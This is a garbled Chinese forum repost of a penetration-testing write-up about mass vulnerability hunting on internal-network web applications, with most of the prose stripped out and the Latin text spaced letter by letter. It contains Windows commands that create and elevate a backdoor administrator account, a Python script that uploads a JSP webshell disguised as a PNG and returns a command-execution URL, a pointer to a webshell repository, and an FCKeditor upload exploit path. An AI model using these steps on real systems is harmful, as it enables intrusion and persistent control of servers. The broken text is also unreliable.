搜索

[7608] 2021-05-26_实战一次从内网到外网,黑盒到白盒的批量挖洞经历qaq

文档创建者:s7ckTeam
浏览次数:26
最后更新:2025-01-17
2021-05-26_实战一次从内网到外网,黑盒到白盒的批量挖洞经历qaq   |   q a q C h a l l e n g e r   F 1 2 s e c   2 0 2 1 - 0 5 - 2 6   #   , 2 8 C h a l l e n g e r P a r t   1   S R C < 0 . 0 > 便 便 1 0 . 1 0 . 0 . 0 / 2 4 G o b y i p e m m w e b a l i v e s c a n G o b y i p w e b h t t p s : / / g i t h u b . c o m / b r o k e n 5 / W e b A l i v e S c a n x x
  2 0 1 8 * *     + + + * * 4 2 0 1 8 * *         1 2 3 4 5 6 x x x > > > G e t s h e l l j s p j s p h t t p s : / / g i t h u b . c o m / t h r e e d r 3 a m / J S P - W e b s h e l l s a d m i n i s t r a t o r x x F O F A x x x
x x , : 2 0 0 1   0 0 7 7 + 2 0 1 8   0 3 1   0 1   0 5 + + + * * 2 0 1 8   1   1 7   0 0 1       + 1 + 1 7 x x 0 0 1 b u r p H O S T , j s p G e t s h e l l 3 3 8 9 n e t   u s e r   m s t l a b   m s t l a b   / a d d   :   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   m s t l a b   / a d d   :  
F C K e d i t o r E x p l o i t h t m l o k s h e l l P a r t   2   : j a v a   w e b G e t s h e l l T o m c a t     w e b a p p s     i m p o r t   r e q u e s t s #   w e b s h e l l f i l e   =   o p e n ( ' s h e l l . t x t ' ,   ' r ' , e n c o d i n g = ' u t f - 8 ' ) s h e l l   =   f i l e . r e a d ( ) # s h e l l = " " "   < %     o u t . p r i n t l n ( " j u s t 4 t e s t " ) ;   % >     " " " h e a d e r s   =   {   " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 8 2 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 8 2 . 0 " } c o o k i e s = { " J S E S S I O N I D " : " 4 F 0 A D E A D B 7 0 A D 1 8 9 2 2 C 8 C 4 3 6 8 3 7 A 5 A 3 D " ,   } #   u r l   =   i n p u t ( " i n p u t   t h e   T A R G E T ( e x a m p l e : [ u r l ] h t t p s : / / 1 2 7 . 0 . 0 . 1 : 1 0 8 0 [ / u r l ] ) > " ) #   u p l o a d _ u r l   =   u r l + " / x x x ? a c t i o n = x x " # f i l e f i l e s   =   { ' f i l e 1 ' :   ( ' 1 . p n g ' ,   o p e n ( ' l o g o . p n g ' ,   ' r b ' ) ,   ' i m a g e / p n g ' ) } f i l e s   =   { ' f i l e ' :   ( " s h e l l . j s p " ,   s h e l l ,   " i m a g e / p n g " ) } #   p o s t u p l o a d _ d a t a   =   { " s t a r t " :   " f o r u m _ u p d a t e _ s e t " ,   " f o r u m _ u p d a t e _ s e t " :   " u p d a t a c o r d " ,   " f o r u m _ n i c k " :   " 1 1 " ,   " f o r u m _ s i g n a t u r e " :   "   " ,   " f o r u m _ p i c _ 2 " :   "   " ,   } #   u p l o a d _ r e s   =   r e q u e s t s . p o s t ( u p l o a d _ u r l ,   h e a d e r s = h e a d e r s , c o o k i e s = c o o k i e s ,   d a t a = u p l o a d _ d a t a ,   f i l e s = f i l e s ) #   p a t h   =   u p l o a d _ r e s . t e x t #   p a t h   =   p a t h [ p a t h . f i n d ( ' d a t a ' ) + 4 : p a t h . r f i n d ( ' j s p ' )   ] #   s h e l l _ u r l   =   u r l + " / d t a " + p a t h + " j s p ? c m d = w h o a m i " #   s y s t e m p r i n t ( ' s h e l l   i s   h e r e : ' + s h e l l _ u r l )
T o m c a t     c o n f   C a t a l i n a l o c a l h o s t   a b c . x m l 访 访 : h t t p : / / i p : p o r t / a b c /   访 访   E : b o o k   T o m c a t     w e b a p p s   w e b . x m l , f i l t e r , f i l t e r Q D K F i l t e j a v a 便 便 j a v a j a v a x x x . j a r I D E A J a v a   B y t e c o d e   D e c o m p i l e r 使 使 x x . j a r , j a r j a v a f i l t e r Q D K F i l t e , , s e s s i o n 0 . 0 w e b . x m l < ! C o n t e x t     , p a t h   访 : / a b c   , d o c B a s e   > < C o n t e x t   p a t h = / a b c   d o c B a s e = E : b o o k   / >
v a r 1 3 g e t F i l e E x t e n d N a m e v a r 1 3 g e t F i l e E x t e n d N a m e g e t F i l e E x t e n d N a m e       |   s q l           |   g e t s h e l l   ~ h t t p : / i p : 8 0 8 0 / x x x / F C K e d i t o r / e d i t o r / x x x / j s p / u p l o a d . j s p

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理